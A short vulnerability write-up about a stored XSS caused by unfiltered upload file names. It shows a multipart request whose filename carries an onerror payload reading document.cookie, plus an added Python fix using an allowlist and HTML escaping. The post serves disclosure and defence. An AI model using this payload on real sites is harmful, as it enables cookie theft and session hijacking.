Stored XSS via file name
A stored XSS caused by the uploaded file name not being filtered.
------WebKitFormBoundarylsTolBO3cLYwqwEU
Content-Disposition: form-data; name="upload_file[]"; filename="<img src=1 onerror=alert(document.cookie)>.jpg"
Content-Type: image/jpeg

0000000
------WebKitFormBoundarylsTolBO3cLYwqwEU
Content-Disposition: form-data; name="media_type"

image
------WebKitFormBoundarylsTolBO3cLYwqwEU
Content-Disposition: form-data; name="callback"

top.GM.upload.finishCallback
------WebKitFormBoundarylsTolBO3cLYwqwEU--
After the upload completes, browse to: https://www.xxx.com/v1/attachment/list/get?media_t...
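The fix for the request above, as an added example that is not part of the original post or the affected site's code: reject file names outside an allowlist at upload time, and HTML-encode the name wherever the attachment list renders it. The function names, the allowlist pattern and the use of Python are assumptions; the request body is rebuilt from the sample above.

```python
import html
import re
import uuid
from email import message_from_bytes

# Constructed request body, rebuilt from the post's sample upload.
BOUNDARY = "----WebKitFormBoundarylsTolBO3cLYwqwEU"
SAMPLE_BODY = (
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="upload_file[]"; '
    'filename="<img src=1 onerror=alert(document.cookie)>.jpg"\r\n'
    "Content-Type: image/jpeg\r\n\r\n"
    "0000000\r\n"
    f"--{BOUNDARY}--\r\n"
).encode()

# Assumed policy: letters, digits, dot, dash, underscore, space, image extension.
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._ -]{0,99}\.(jpg|jpeg|png|gif)")

def uploaded_filenames(body, boundary):
    """Return the client-supplied filename of every file part in the body."""
    head = f"Content-Type: multipart/form-data; boundary={boundary}\r\n\r\n".encode()
    msg = message_from_bytes(head + body)
    return [p.get_filename() for p in msg.walk() if p.get_filename()]

def accept_upload(filename):
    """Reject names outside the allowlist; store under a server-generated name."""
    if not SAFE_NAME.fullmatch(filename):
        raise ValueError("file name rejected")
    ext = filename.rsplit(".", 1)[1]
    return {"stored_as": f"{uuid.uuid4().hex}.{ext}", "display_name": filename}

def render_list_item(display_name):
    """Encode on output as well, so names stored before the fix render as text."""
    return f"<li>{html.escape(display_name, quote=True)}</li>"

if __name__ == "__main__":
    for name in uploaded_filenames(SAMPLE_BODY, BOUNDARY):
        print(render_list_item(name))
        try:
            accept_upload(name)
        except ValueError as exc:
            print("upload refused:", exc)
```

Output encoding is the control that closes the XSS; the allowlist only keeps hostile names out of storage and logs.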
This article was migrated from the Knowledge Planet (知识星球) group “火线Zone”.